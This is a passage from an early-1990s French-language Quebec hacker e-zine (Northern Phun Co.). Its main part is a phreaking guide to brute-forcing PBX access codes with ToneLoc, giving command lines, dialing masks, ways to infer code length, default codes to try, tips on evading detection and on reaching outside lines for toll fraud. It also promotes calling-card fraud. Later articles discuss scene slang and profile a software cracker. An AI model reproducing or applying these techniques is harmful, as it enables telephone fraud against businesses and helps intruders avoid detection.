889  PACIFIC TELCOM
890  ATX-COMMUNICATIONS
891  TMC COMMUNICATIONS
892  AT&T-C
896  TEX-NET
898  COMMUNICATIONS GROUP OF JACKSON
899  CABLE & WIRELESS COMMUNICATIONS
902  RADIO COMMON CARRIER PAGING
908  AMERITECH AUDIOTEX SERVICES
912  RADIO COMMON CARRIER PAGING
922  AT&T-C
923  ALLNET COMMUNICATIONS SERVICES
924  800 NUMBER SERVICE & ASSIGNMENT CENTER
925  MCI TELECOMMUNICATIONS CORPORATION
926  MCI TELECOMMUNICATIONS CORPORATION
927  US TELCOM, INC./US SPRINT
928  AMERICALL SYSTEMS - LOUISIANNA
932  AT&T-C
933  MCI TELECOMMUNICATIONS CORPORATION
934  MCI TELECOMMUNICATIONS CORPORATION
936  R-COMM
937  MCI TELECOMMUNICATIONS CORPORATION
939  TELENATIONAL COMMUNICATIONS
940  ATC / SOUTH TEL
942  AT&T-C
943  AUS, INC.
944  MCI TELECOMMUNICATIONS CORPORATION
945  MCI TELECOMMUNICATIONS CORPORATION
946  PHONE ONE - AMERICAN PIONEER TELEPHONE
947  MCI TELECOMMUNICATIONS CORPORATION
948  PHOENIX NETWORK
950  MCI TELECOMMUNICATIONS CORPORATION
951  PHONE AMERICA
952  AT&T-C
955  MCI TELECOMMUNICATIONS CORPORATION
960  COMTEL OF NEW ORLEANS
962  AT&T-C
963  STATE OF CALIFORNIA
964  MCI TELECOMMUNICATIONS CORPORATION
965  TMC OF LEXINGTON
966  CABLE & WIRELESS COMMUNICATIONS
967  MCI TELECOMMUNICATIONS CORPORATION
968  TELEDIAL AMERICA
969  CABLE & WIRELESS COMMUNICATIONS
972  AT&T-C
980  VALU-LINE OF LONGVIEW, INC.
981  PUERTO RICO TELEPHONE
982  AT&T-C
983  WESTERN UNION TELEGRAPH CO.
986  WESTERN UNION TELEGRAPH CO.
987  BITTEL TELECOMMUNICATIONS CORPORATION
988  MCI / TELECONNECT
989  CABLE & WIRELESS COMMUNICATIONS
990  FEB CORPORATION
992  AT&T-C
993  ?
996  VALU-LINE
999  MCI TELECOMMUNICATIONS CORPORATION
------

Cette liste, en sachant que les prfix AT&T devraient tre les seuls que
vous allez scanner, est un outil capital pour toute personne utilisant
Toneloc pour du scanning intensif...  Un dernier petit point  ce
propos... Plutt que de perdre votre temps  chercher des PBX MCI ou
Sprint et  les hacker, trouvez-vous une carte d'appel et utilisez-la
donc DE VOTRE DOMICILE car, dans le fond, le risque de se faire prendre
est presqu'aussi grand! Si,  la rigueur, votre souci est de pouvoir
faire des appels gratuits  partir d'une cabine, vous verrez bientt un
autre text-phile chez NPC, publie par moi-mme et qui racontera comment
se procurer des numros de cartes d'appel d'une faon simple et rapide.




          
           Les rudiments du meilleur ami du Phreaker : TONELOC

     Vous vous tes tous procur le fameux et lgendaire Toneloc. Je ne
comprends toutefois pas un petit dtail : pourquoi autant de gens ont
tant de mal  l'utiliser? Ce n'est pourtant pas compliqu, bordel! Et
c'est est sans parler de la maudite Bunch de lamers qui ont des
problmes de configuration et qui ne lisent mme pas la Doc avant de me
demander, tel des idiots : " Comment je fais pour faire marcher Toneloc
?" Bordel! La doc est pourtant l pour a! Je peux comprendre les gens
qui ne la lisent pas lorsqu'ils l'utilisent sans problme, mais en cas
de problmes, utilisez la DOC putain de dieu!!!
     Enfin... Aprs cette brve monte de lait, je dois toutefois y
ajouter un petit commentaire... Certaines personnes pleines de bonnes
volont n'ont jamais et ne seront jamais capables d'installer Toneloc
pour diverses raisons INTELLIGENTES.  J'ai remarqu quelques LGERS bugs
que renferme ce merveilleux programme. Premirement, il y a les pauvres
utilisateurs de Com3 ou Com4. La configuration par dfaut pour les com3
et Com4 sur un U.S.Robotics (interne) est respectivement l'IRQ 5 et 7.
Ce cher Toneloc digre mal les changements d'IRQ. Si vous voulez
utiliser Toneloc sans problme avec un Interne, vous devrez changer
votre IRQ's Setting du modem sur l'IRQ 4 pour le Com3 et l'IRQ 3 pour le
Com4. (Et oui, le contraire du bon sens!) Pour les pauvres personnes qui
possdent une imprimante laser en srie et une souris dans les 2 coms
externe, comme moi, la souris et le modem doivent absolument tre sur
des IRQ DIFFRENTS, parce que les deux items font appel  l'IRQ. Pour ce
qui est de l'imprimante en srie, mme si elle est relie  l'IRQ via le
port srie, elle ne se sert pas de l'IRQ de toute faon alors elle ne
devrait pas poser de conflit. Certaines personnes que je ne nommerai pas
 cause de leur nombre incalculable  Qubec, ont eu la trs mauvaise
ide de s'acheter un modem BOCA...  Je ne parlerai pas plus de ces
modems de qualit plutt douteuse puisque je crois que la plupart des
personnes concernes savent trs bien ce que j'en pense.  Je ne suis pas
encore  la veille de partir une des ces fameuses guerres HST AGAINST
V32BIS.  C'est plutt que je trouve TRS stupide de payer pour une merde
TOTALE!! Je me dis que le v32bis est surement une trs bonne sorte de
protocol, mais que la qualit des Bocas et de certains autres du genre
laisse BEAUCOUP  dsirer... Enfin... Passons aux rudiments de Toneloc
pour ceux qui ont un modem valable ou ceux dont l'intelligence est
suffisante.  Petite note : si votre modem ne donne aucun problme 
Toneloc et que mme aprs avoir lu la Doc vous ne comprenez toujours
pas, jetez ce journal aux ordures  la seconde! Le PhReaK demande un
minimum de quotient intellectuel...

     Nous ne verrons ici que la Command Line pour excuter le programme,
ainsi que les principales fonctions... Je vais laisser tomber les
fonctions spciales comme le ExMask et ce genre de commandes.
     Voici la commande de base :

TONELOC [nom de la]  /M[le MASK  ]   /C[le fichier configuration]
        [datafile ]     [composer]       [ utiliser]

Le nom de la Datafile est le fichier .DAT o toneloc inscrira toutes les
informations correspondantes aux rsultats de votre scan.

Le MASK sera compos des les numros que vous voulez scanner.
Exemple : Disons que vous voulez scanner l'Exchange 321 dans les 800, et
bien il vous faudra taper : /M1800321xxxx o les xxxx reprsentent les
numros  composer au hasard. 
          Disons que vous voulez scanner un code de 3 chiffres dans un
pbx 800. Si le numro du PBX est le 1-800-435-2323, et que le code prend
3 chiffres, alors vous devrez inscrire /M18004352323wXXX .

REMARQUE :     Le -=W=- sert  dire au modem d'attendre un dial tone
pour continuer. Autrement dit, il composera 18004352323, il attendra que
le pbx rponde avec le Dial Tone, et lorsque le modem dtectera le Dial
Tone, il enchanera en composant les XXX qui sont en fait trois chiffres
au hasard. (Nous verrons plus tard comment reconnatre un code de trois
chiffres...

Le fichier de configuration  utiliser est le fameux .CFG pour lequel
tant de gens ont de la misre! La commande /C est optionnelle, mais
personnellement, je trouve trs utile et beaucoup plus rapide de se
crer plusieurs .CFG selon les endroits o l'on dsire scanner. Par
exemple, il peut tre trs pratique d'utiliser un .CFG diffrent pour
scanner les numros LOCAUX et les numros 800, surtout pour la raison
que le timeout par appel devra tre plus long pour les 800 que pour les
LOCAUX et qu'diter le mme .CFG  chaque fois que l'on veut scanner
ailleurs peut tre trs ennuyant, long et INUTILE... Personnellement
j'utilise six .CFG diffrents...

EXEMPLE : Je veux scanner le pbx 1-800-435-3825 qui possde 4 chiffres
          de code. Vous dsirez utiliser le fichier configuration
          CODE.CFG.  Donc, vous devrez entrer :

               Toneloc code3825 /M18004353825wXXXX /Ccode

Voil en clair et simple... Pour les fonctions avances, LISEZ LA DOC!!
Dernire petite chose : pour faire des pauses de temps pendant le
dialing, utiliser la VIRGULE ','  Elle vaut 2 secondes d'attente par
dfaut, ce qui laisse sous-entendre que c'est configurable. La commande
de mon modem pour dfinir sa dure est ATS8=x en seconde.

-=REMARQUE=-  :  Ne JAMAIS utiliser un template de plus de 4 'X' dans
                 une seule command line. Toneloc n'est pas conu pour  
                 plus long que XXXX. Bien sur, rien ne vous empche de 
                 rpartir les X un peu partout...
                 Pour un code de 5 chiffres, fates-vous 10 command line 
                 et DataFile et fates plutt 0XXXX, 1XXXX, 2XXXX, etc. 
                 comme Mask...




          
           Le nombre de chiffres de code et la partie HACKING du PBX!!!

     Je dirais que c'est vritablement la partie la plus difficile et
celle qui demande le plus d'exprience...  En effet,  cause de la trs
grande varit de modles de PBX, il devient souvent trs difficile
sinon totalement impossible de trouver de combien de chiffres est
compos le code.  Nous verrons ici plusieurs exemples qui vous
permettront de comprendre comment trouver ce nombre si important.
Que se passe-t-il lorsque vous entrez le bon code? Le PBX rpondra par
un autre tone que Toneloc dtectera. Vous aurez donc dtect le ou les
bons codes! Voici maintenant certains types :

     1-   Il y a les vidents. J'en ai vu plusieurs de ceux-l, que
semblent particulirement adorer MCI ou SPRINT.  J'en ai par contre vu
aussi plusieurs de la sorte chez AT&T. Cette sorte de PBX est tout
simplement la plus facile  hacker. Pourquoi? Parce que vous n'avez qu'
entrer un chiffre aprs l'autre au hasard et  un certain moment, vous
entendrez un certain signal trs distinct. Disons que vous avez entr 4,
3, 5, 6 et que soudain vous entendez un Fast-Busy (Signal ENGAG
rapide), votre code est invalide. Par contre, puisque le systme vous
dit lui mme ou presque que le code est incorrect aprs quatre touches,
vous pouvez conclure facilement que le code est de quatres chiffres.
Certains systmes dont les oprateurs sont plutt stupides vous feront
entendre carrment un message enregistr vous disant que le code est
incorrect... Ridicule...

     2-   Les fameuses sirnes...  Je ne sais pas pourquoi, mais j'ai
constamment l'impression qu'elles sont l uniquement pour nous
embter... Les sirnes dont nous parlons ici sont celles que vous
entendez lorsque vous venez de composer un code incorrect dans un pbx...
Je ne parle pas des sirnes que vous pouvez rejoindre directement comme
les numros 800 ci-bas...  Elles ont une particularit : votre modem la
dtecte comme un tone!  Voil qui est plutt ridicule tant donn que la
diffrence  vos oreilles est norme. Si vous n'en avez jamais entendu
une, voici quelques numros : 1-800-521-0315, 1-800-521-8461 ou 1-800-
521-8470... Comment faire pour que votre modem la diffrencie d'un tone
normal? Il n'y a aucun moyen... ;-)  Vous devrez plutt chercher
ailleurs... Qu'arrive-t-il lorsque vous mettez un Digit (son d'un des
chiffres du clavier Touch Tone) ?!?  La sirne continuera comme si elle
n'avait rien entendu et VOTRE MODEM LA DTECTERA  NOUVEAU COMME UN
TONE... Que devez-vous faire en premier de votre domicile pour composer
un longue distance? Vous tapez le numro -=1=- du tlphone... Et
qu'arrive-t-il lorsque vous entrer le -=1=- ? Le dial tone se tait...
Maintenant allez configurer votre .CFG pour qu'il dtecte ALL BUT TONES
(Tout sauf les tones). Voici la command line :

Toneloc code435 /M18004352898wXXXXw1 /Csiren

Commencez-vous  comprendre l'astuce? Si vous avez entr un 1 en
entendant la sirne, la sirne continuera d'mettre et votre modem
dtectera  nouveau le tone, donc le code que vous aurez entr en
premier sera un Faux.  Par contre, si vous avez entr le BON code, le W
aprs les XXXX dtectera un VRAI tone, il composera 1 et comme chez
vous, le Dial Tone se taira et votre modem ne pourra pas dtecter de
tone avec le dernier W... Donc votre modem dtectera un Timeout!
(Calculez bien votre temps pour que si vous entrez le bon code, le
moment de silence  dtecter ne dpasse pas 3-4 secondes...)  En fait
vous aurez scann pour les Timeouts...

     3-   Les inconstants : Ceux l sont assez bizarres... Le nombre de
chiffres possibles  entrer varie selon le premier chiffre que vous
entrez. Habituellement, scanner un tel systme ne mne  rien sauf dans
certain cas o, en entrant 1 seul chiffre de code (normalement 9,8 ou
7), il vous redonne immdiatement un dial tone. Dans ces cas vous avez
deux choix : vous pouvez suivre  partir de ce moment la mthode 1 ou 2,
ou vous pouvez suivre la mthode 4 ci-dessous...

     4-   Les NUMROS + CODE avec avertissement... Ceux-l sont
normalement pour des codes qui semblent tre de 13  17 chiffres. En
effet, on peut quelques fois croire qu'il sagit d'un code de 13  17
chiffres, mais o il ne sagirait en fait que de composer son numro 
composer (Sans le 1 normalement) et d'enchaner IMMDIATEMENT avec le
code. Le PBX procdera automatiquement  la communication si vous
possdez le bon code sinon, vous obtiendrez le message d'erreur. Pour
dtecter que vous avez atteint le numro que vous vouliez appeler,
fates le composer un numro toujours engag. De cette faon, si votre
modem dtecte un busy, c'est que vous aurez compos le bon code puisque
la communication aura t effectue... Command line : 

Toneloc code435 /M18004353498w4186837183XXXX /Cnum&cod
                              
O 418-683-7183 devrait       Le "suppos"
tre un numro TOUJOURS       code de 14
BUSY! (Engag)                 chiffres...

     5-   Les infinis... Ah bon dieu ceux-l! C'est ce que j'appelle en
langage courant : les Pas-Hackables!  Peu importe le nombre de chiffres
que vous entrerez, le silence se perptuera sans lasse, jusqu' ce que
vous deveniez fous et que vous effaciez le numro...  J'en suis sr, ils
ont t conus pour a!!!! ;-)  Il y a plusieurs solutions possibles...
Essayez, si vous avez du temps  perdre, de SUPPOSER que le nombre de
chiffre du code est de 3 ou 4... Plus que cela serait perdre son temps
pour un essai aussi peu assur de rendement. Essayer la mthode 1 et 4.


     Vous venez de voir les principales faon de HACKER un PBX... Il en
existe videmment d'autres. Je ne parlerai que trs peu du rle que joue
la touche dise -=#=- dans un PBX... En effet, j'ai remarqu que les PBX
qui l'utilisent sont souvent TRS difficile  hacker. Voici un exemple
d'un systme commun utilisant la touche dise :
     J'ai trouv quelques fois un systme o l'on pouvait composer
autant de chiffres que l'on dsirait et qu' n'importe quel moment, on
pouvait appuyer sur la touche dise et obtenir un tone ou un Fast-
Busy... Dans le cas d'un tone, on peut supposer qu'il faut entrer son
code, appuyer sur # pour muler un Enter, et ensuite composer le numro
avec ou sans 1 devant et esprer avoir le bon code. Dans le cas d'un
Fast-Busy, on peut supposer qu'il donnerait un tone si le bon code avait
t entr...  Vous devinez la suite... (Je l'espre!!!)  Le # peut jouer
d'autres rles mais je ne parlerai pas de ces quelques cas particuliers.
Il arrive aussi que la fonction # soit remplace par le *.

REMARQUE :     Il existe certains systmes, normalement caractris par
la mthode 3 et 5, qui seraient supposment de vritable Bunker
d'information et de lignes de toutes sortes... Les capacits de ces PBX
sont pour la plupart inconnues, mais il s'agirait de PBX o l'on peut
trouver des CARRIERS, des systmes de VMB (Voice Mail Box) et plusieurs
lignes tlphoniques. Ces systmes appels CBX seraient d'une
performance optimale et de possibilits seraient immenses. Un seul petit
problme : ils seraient parat-il munis de systme ANI... Ooops! Vous
comprenez ce que je veux dire? Que les pbx de la mthode 3 et 5 seraient
moins "safe"... Mais ceci n'est qu'un avertissement fond sur un
ramassis de rumeurs plus ou moins fondes et dont la vracit n'a jamais
t vrifie...




           
            Aprs la dcouverte du Code!

     Tout est presque gagn maintenant...  Vous avez trouv le principal
qui est le code et il ne vous reste plus qu' accder  la ligne
tlphonique de sortie...  Rien de trs compliqu!  Je suis sr que, un
jour que vous tiez dans un bureau quelque part, vous avez dj demand
si vous pouviez tlphoner et on vous a rpondu : Appuyer sur le 9
avant de faire votre appel  C'est le mme principe, car une fois que
vous avez entr le bon code d'accs, vous vous retrouverez dans la mme
position QUE TOUT AUTRE PERSONNE QUI PREND LE TLPHONE DANS LE BUREAU!! 
Ce qui veut dire?  C'est que pour accder  la ligne tlphonique de
sortie, vous n'aurez qu' taper le 9 comme si vous tiez  l'intrieur
du bureau en question...  Je dis que vous devez taper 9, mais cela n'est
qu'une gnralit. En effet, sur plusieurs systmes de PBX, le numro 
entrer aprs avoir entr le code sera un autre que 9... En gnral, il
peut sagir du 9, du 8 ou du 7, mais si le systme persiste  ne pas
fonctionner aprs cela, essayez les tous et a devrait aller...  Une
fois tout entr correctement, montez le dragon ail de la communication
et chevauchez le  travers le ddale sinueux des lignes tlphoniques
mondiales jusqu' l'puisement de toutes ses ressources d'nergie...
C'est alors que vous devrez revenir au bercail et chercher un autre
dragon qui vous fera repartir vers l'aventure...




          
           Miscellaneous problems...

     Voici quelques trucs pour certains problmes que vous pourriez
retrouver avec certains systmes dont j'ai eu  faire ou dont j'ai
entendu parler :

     1-   Parfois, aprs avoir compos le code d'accs, vous n'aurez pas
 composer de chiffres comme le 9,8 ou 7 pour avoir accs  la ligne de
sortie, vous n'aurez dans ces rares cas qu' composer directement le
numro LD (Long Distance)...
     2-   Lorsque vous avez entr le bon code, le chiffre pour accder
 la ligne tlphonique, que vous commencez  composer 1-416-765-9823 et
que le PBX vous envoie un message d'erreur, essayez sans le 1 au
dbut... Il arrive souvent qu'il soit facultatif.
     3-   Disons que vous tes trs chanceux et que vous rencontrez un
PBX ne possdant pas de code...  Selon mes contacts, la compagnie de
tlphone n'est normalement pas responsable des fraudes sur les systmes
de PBX qu'elle loue aux compagnies.  Leur position est que la compagnie
n'a qu' se dbrouiller pour effectuer un contrle rgulier sur les
appels...  De plus, un systme qui n'a absolument aucune protection ne
devrait certes pas possder le statut de SYSTME PRIV puisque il ne
fait rien pour empcher les intrus, donc on pourrait le qualifier de
systme plublic, donc ouvert  tous... Mais cela n'est que mon
impression personnelle et je ne me suis pas inform sur les clauses de
fraudes tlphoniques...  Voil qui sera surement un sujet futur trait
par moi-mme dans un prochain numro de NPC!
     4-   J'ai scann UNE SEULE FOIS dans l'exchange d'une petite
compagnie du genre de PUERTO RICO TELEPHONE...  J'ai retenu la leon...
Ne perdez donc pas votre temps...  Sauf dans le cas extrme o un de vos
contacts vous aurait jur qu'une de ces compagnies BS renfermerait un
bunch de PBX...  Mais mme dans ce cas, la scurit de ces compagnies
n'a jamais t vrifie alors... A VOS RISQUES!!!
     5-   Les phone-traps : Attention  ces... Anti-Fraudeurs! C'est
uniquement dangereux lorsque vous scannez pour des carriers, mais je
vous en fait prendre note...  Il mettra un Fake-Carrier et fera en
sorte que votre modem s'y connecte. Il notera ensuite la date, l'heure
et le numro d'origine de l'appel et votre numro sera plac sous
surveillance comme tant un numro suspect... Si vous scannez pour les
tones, a ne devrait poser aucun problme...
     6-   Avant de commencer  hacker un PBX, TOUJOURS essayer certains
codes comme 1234, 9876, 0123, 0987, 1111, 2222, 3333, etc... Enfin vous
voyez le genre de code...  Le trouver de cette faon pourrait vous
viter une perte de temps norme... Surtout si le PBX possde 5 chiffres
de code!
     7-   Ne perdez pas votre temps! Scanner toujours les PBX  3 ou 4
chiffres de code, mais pas plus... Cinq chiffres de codes peut  la
rigueur faire l'affaire si vous remarquez que la qualit de la ligne est
leve... Dans le cas contraire laissez tomber...
     8-   TOUJOURS scanner en RANDOM et non en mode squentiel. 150 000
numros appels en mois et ce, tous un  la suite de l'autre est
videmment suspect, et je suis sr que c'est ce que vous ne dsirez
pas...
     9-   Petite HYPOTHSE : Probablement que les compagnies de
tlphone savent que les modems dtectent les sirnes. Donc, les
nombreux numros qui ne seront que des sirnes directes comme les trois
numros que j'ai donn plus haut mais que vous aurez dtect comme tant
des tones sont peut-tre en fait des alertes anti-fraudes pour la
compagnie de tlphone comme quoi il vaudrait mieux surveiller les
systmes de PBX de cet Exchange  cause d'un scanneur dans le rseau. Ce
scanneur serait vous-mme videmment... Peut-tre que ces fameuses
sirnes notent tout simplement votre numro quelque part comme tant
suspect, puisque vous aviez une chance sur 10000 de composer ces numros
et que vous avez gagn... Bref, cela n'est pas d'une trs grande
importance  savoir, mais ce n'tait qu'une simple hypothse pour tenter
de comprendre  quoi servent les sirnes directes... Si quelqu'un a une
ide intelligente et fonde sur leur utilit, svp me le faire savoir...




          
           Conclusion

     Je crois bien avoir rpondu  toutes les questions possibles sur
les PBX ou presque...  Je tenterai de me concentrer plus en dtail sur
les schmas techniques des PBX dans un prochain numro de NPC si une
demande vidente s'en fait ressentir...  Je dsire prciser que je
pourrai tre rejoint sur la plupart des bbs pirate de Qubec sous ce
mme alias...  TOUTEFOIS, allez plutt crire vos commentaires au Medic
Bbs de la faon spcifie au dbut de ce journal...  Ce guide peut
facilement servir de bon dpart pour tout phreaker dbutant et je n'ai
pas peur de le dire, de rfrence pour un initi...  Enfin... J'apprcie
toujours les commentaires de tous genres et les ventuels conseils s'ils
sont justifis et intelligents. 

     J'aimerais remercier cordialement un certain usager des bbs
"pirates" de Qubec nomm Psychedelic Madness, aka Qubec Man, qui m'a
fait raliser  quel point un guide sur les PBX tait ncessaire
lorsqu'il m'a fait part de l'tendue de ses connaissances sur les PBX...
Humm... Hummm... En effet, ce dernier lamer croyait dur comme fer qu'un
PBX tait un TLPHONE DU FUTUR!!! Et merde! C'est  esprer que je n'en
rencontrerai pas d'autre comme lui sur ma route... Je suppose qu'au
prochain message, il me dira que les codes de PBX, tlphones du futur,
sont conus pour faire des appels sur la plus proche station martienne
du systme solaire...


      ͻ
     ڶ N   ǿ    Ŀ         Ŀ  Ŀ Ŀ    Ŀ
  Ĵ  P  Ŀ      Ŀ    Ŀ ſ     Ĵ1
        C                                
      ͼ                    

  Je lame, tu lames, il lame, nous lamons, vous tes une gagne
de morons...
 
--------------------------------------------------------------
  
                      By Mental Floss For NPC.
                      ------------------------

     Lamer, un mot utilis  toutes les sauces. C'est rendu
que la majorit des morons out there se sert de ce mot, sans
savoir, ou en pensant savoir ce que a veut vraiment dire. Y'a
aussi toute la gang de so called 'Anti-LamerZ', le "z"
majuscule est ben important, parce qu'ils pensent que a fait
"plus meilleur". D'aprs ce que j'ai pu comprendre, un
'Anti-LamerZ', comme ils prtendent tre, est quelqu'un qui a
un suppos statut plus lev dans leur hirarchie de minable.
En d'autres mots, un anti-lamer est le meilleur des pas bons.
Mais en fin de compte, selon eux, tout le monde est lamer et
eux autres sont anti-lamer, donc pas lamer du tout. Disons
qu'ici je n'ai pas eu le choix d'employer ce terme (LAMER)
pour que les personnes concernes puissent comprendre ce que
je voulais dire, mais  mes yeux le mot 'lamer' n'a pas de
sens dans la phrase prcdente: vous verrez plus loin la
dfinition de 'lamer'.

     Une petite prdiction en passant: d'ici pas grand temps
une grande majorit des morons vont dcouvrir le terme
'LITE', mme si ce terme est employ depuis des lunes. A
partir de cet instant, on entendra les mmes personnes qui
utilisaient le terme 'lamer' auparavant dire... 'je suis plus
lite que toi', 'mon bbs est un bbs lite' etc... Et encore
une fois cette pellet de stupides ne sauront pas ce que veut
dire ce mot... Ce sera srement un sujet trait lors d'un
futur NPC. 

     Lamer...Un historique?
Pourquoi pas? Depuis au moins 4-5 ans, on emploie ce terme 
Qubec. Ce mot de 5 lettres, issu des belles annes du C64,
tait,  ses dbuts, employ dans son vrai sens. Lentement,
quelques morons fervents de ce mot l'ont mut en 'LAME' et
 partir de ce moment, un lamer tait devenu un 'lame'. Je
peux vraiment dire que c'est  partir de cet instant que la
dcadence du terme 'lamer' commena. Peu  peu, on est venu 
s'en servir pour identifier n'importe quoi, un peu comme on se
sert du mot 'chose' ou 'patente'. Donc..."T'es lame, c'est
lame, mon chien est un lame". Dans certains cas cette gang de
morons, sans vraiment le savoir, utilisaient le mot 'lame' en
y faisant reflter la bonne dfinition (le terme 'lame' sera
dfini plus tard). Comme je disais, pour un temps on se
servait du terme lame sans savoir ce que a voulait dire, mais
en utilisant le bons sens du terme. Plus tard, au grand
bonheur de tous les morons, I-COMM ouvrit ses portes, et ce
ft la retransformation de 'lame' en 'lamer'. Depuis ce temps
la majorit des low-life se traitent de 'lamerZ' entre eux (le
z est bien important encore une fois).

     Des dfinitions?, ouvrez grand vos yeux, surtout
les personnes concernes.

Lame 
----
Nul, d'une nullit.
En qubcois: poche, crisse de pas bon.

Lamer
-----
NB: Ceci est la dfinition originale du terme, telle qu'utilise
     l'poque, mais de nos jours les morons se multiplient sans  
    cesse dans la scne. Donc, tout comme les tortues             
    adolescentes, le sens des mots subit certaines mutations.

On dit 'Lamer' d'une personne qui rippe les codes d'un autre. 

Pour ceux d'un niveau intellectuel infrieur: On traite de
'Lamer' une personne qui prend les instructions d'un programme
fait par un autre et qui dit ensuite que c'est elle qui l'a
programm. A l'origine c'tait dans des intros ou des dmos
que les lamers rippaient. 

Voici un exemple d'un RIP, tel que pratiqu par celui qu'on
peut considrer comme un soit-disant LAMER....

Le plus frappant... Notre ami, Jrme Gauthier (Lucyfer ou
John Myles si vous aimez mieux), avec son so-called AXE
(Atomix Software),  l'poque de The Forbidden Productions. 

-Lui ripper? Jamais, voyons... exemple... Pkzip 1.93Beta...

--------------------------------------------------------------
PKUNZIP (R)   FAST!   Extract Utility    Version 2.01   03-15-92
Brough to you by The Forbidden Productions. Ha!. PKUNZIP/h for help
Thanx Heavy for the Originals. 

On this 23rd day of March 1992, Heavy Metal gave me the original v.2.01 
 
of this package. Now around 5:50pm, i'm just telling you that WE ARE THE 
  
BESTS and we'll keep it going on. The Forbidden Productions : Lucyfer
, <DynamiX> and The Jungle Boy. For the lastest, call the Pandeamonium, 

The Lucyfer's Palace  
Phone # Available by a MEMBER! 
--------------------------------------------------------------

Ceci est simplement Pkzip 1.93 avec le texte chang  l'aide
d'un sector editor comme PcTools. Pour prouver  quel point il est
facile de ripper un programme, nous avons inclus un loader ripp,
NPC.EXE.

This is the living truth... 
Les paroles s'envolent mais les crits restent.

Un autre exemple... Il y a un certain temps, je suis tomb sur
une copie de Hoover Force, ou quelque chose dans le genre.
Dans le .NFO, on pouvait y lire....Cracked By Bad
Preacher/ISD. Mais, en fin de compte, cette bande de morons
avait seulement remplac le nom du cracker original par leur
nom... Trs ingnieux n'est-ce pas... Ils ont pris le crdit
du crack: disons plutt qu'ils ont ripp le .NFO...donc...
encore une fois...
RIPPER=LAMER.

J'espre que ces exemples vous ont aid  mieux comprendre le
sens du mot 'lamer' et qu' l'avenir vous allez en faire bon
usage, pas comme le mot FUCK.
 

pilogue...

A la limite (extrme limite), 'lame' est presque semblable 
'lamer' parce qu'un ripper (lamer) est un pas bon, un nul
(lame). Donc il existe toujours un certain lien entre les
deux, mais pas au point d'abuser du mot 'lamer'.

Am I the only lame person on this planet?...
Nope...You're among the 90% of lame people...yep 90%.
-STATISTIQUE CANADA

Et oui, dans la scne PC/AMIGA/C64 etc... il y a 90% de pas
bons et 10% de gens qui contribuent au bon fonctionnement et 
la survie de cette scne.

Donc un lamer est nomm ainsi quand il le faut, mais cela ne
veut pas dire qu'il faut appeler une patate une carotte.


YOU CAN PUT A BULLET IN MY HEAD, BUT YOU CAN'T KILL A FUCKING WORD
I'VE SAID. 


      ͻ
     ڶ N   ǿ    Ŀ         Ŀ  Ŀ Ŀ    Ŀ
  Ĵ  P  Ŀ      Ŀ    Ŀ ſ     Ĵ1
        C                                
      ͼ                    



                    OU SONT PASSS LES VRAIS REBELLES?

                      --=YAKOUL IS ALIVE AND WELL=--
                         (and we're glad for it!)

                                   par 
                                Blitzkreig


     On vous parle d'un vieux de la vieille, l! A l'poque ou
j'ai rencontr Yakoul, il en tait dj  son troisime net alors
que je cherchais encore comment insrer une disquette dans mon
XT. S'il est moins actif depuis un an, mettez  sur le dos des
femmes et du Bell... 

Fiche signaltique:

Age: 30 ans
Autres handles: Intman
Annes d'exprience: A achet son premier VIC le 25 juin 1982
Machines successives: Vic 20, 6 (oui! 6!) Commodore 64, Amiga
500, Amiga 2000
Associations passes: Crystal, Angel, Ctrl-X
Complice et co-sysop: LOUKAY

Le bab de Yakoul est ferm depuis six mois environ. Il tait 
ce moment indpendant (c'tait mme le nom de son bab) aprs
avoir t successivement membre des trois groupe nomms plus
haut.
Yakoul est un matre du crack. Le nombre de programmes qui se
sont laisss dflorer par ce mec est incalculable. Ses meilleurs
coups: AIRBORNE RANGER (son crack loadait plus vite que
l'original!), 21 SEC. BACK-UP, et un de ses modules, FAST-FILE
COPY (un crack complexe qu'il a t le premier  russir). Son
utils prfr pour cracker tait  l'poque FASTLOAD de Epyx.
J'ai dj vu Yakoul cracker un programme d'Accolade en CINQ
minutes, montre en main!

YAKOUL regrette qu'aujourd'hui, la TOTALIT des rseaux de
crackers ne prennent pas la peine de tester les programmes au
complet avant de les runner sur un board. A son avis, cela dnote
plus que de la paresse ou de la btise: c'est un bon truc pour
s'en mettre plein les poches,  coups de ratios et de dollars...
Plutt que de faire un package avec traner, crack et doc, on
distribue le tout en module: le trainer d'un bord, les docs de
l'autre, 3-4-5 updates pour le crack, bref, une job salope...
Yakoul et Loukay, son complice, travaillaient fort diffremment,
allant mme jusqu' marquer leurs cracks (le X-1 blanc sur fond
bleu dans le coin) pour qu'on puisse identifier la provenance du
crack si, d'aventure, celui-ci tait dfectueux...
 
Les distributeurs s'changeaient les warez par la poste, 
l'poque, parce que le standard tait encore 1200 bauds (pour les
plus fortuns!) et mme 300 bauds! On va probablement rire de la
mme faon des 9600 et des 14.4 dans quelques annes! 

Yakoul n'hsite pas, comme plusieurs d'entre nous,  soulever le
couvercle de la machine pour aller lui tripatouiller les tripes
 coup de tournevis. Son exprience avec les Commodore 64 l'a
bien servi: il s'en est procur successivement 6, dont plusieurs
qui avaient rendu leur dernier souffle, pour les reconstruire et
les refiler  un ami...

Question virus ou intrusion sur les systmes, nous ne donnerons
pas le nom des victimes, parce que certains boards de crosseurs,
 Qubec et ailleurs, portent encore les marques de la colre de
Yakoul (mais si vous saviez!!! Hahaha!).

Yakoul se dsintresse un peu de la scne depuis quelques temps
pour diverses raisons. Le dpart de son complice de toujours,
Loukay, a laiss un vide, dit-il. Et son rcent bust par le Bell
(fucking cartes d'appel! Mme les meilleurs peuvent faire des
erreurs!) lui a port un coup dur.  Mais je ne serais pas surpris
outre mesure de le voir ressurgir d'ici quelques temps (c'est du
moins ce que je lui souhaite, bordel!). Les portes de Northern
Phun Co. lui sont grandes ouvertes! 

Je laisse  notre invit le mot de la fin:

" Il n'y a rien qui me fait plus chier que ceux qui utilisent
frauduleusement le handle de quelqu'un d'autre pour arriver 
leur fin. Ce n'est pas mieux de tenter de faire mousser sa
rputation en prtendant tre en mesure de faire des choses alors
que vous n'y connaissez rien. " 

Une bonne dfinition d'un lamer, s'il en est une!


      ͻ
     ڶ N   ǿ    Ŀ         Ŀ  Ŀ Ŀ    Ŀ
  Ĵ  P  Ŀ      Ŀ    Ŀ ſ     Ĵ1
        C                                
      ͼ                    




NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC
                                                                             
N                         Ralis par: Coaxial Karma                          N
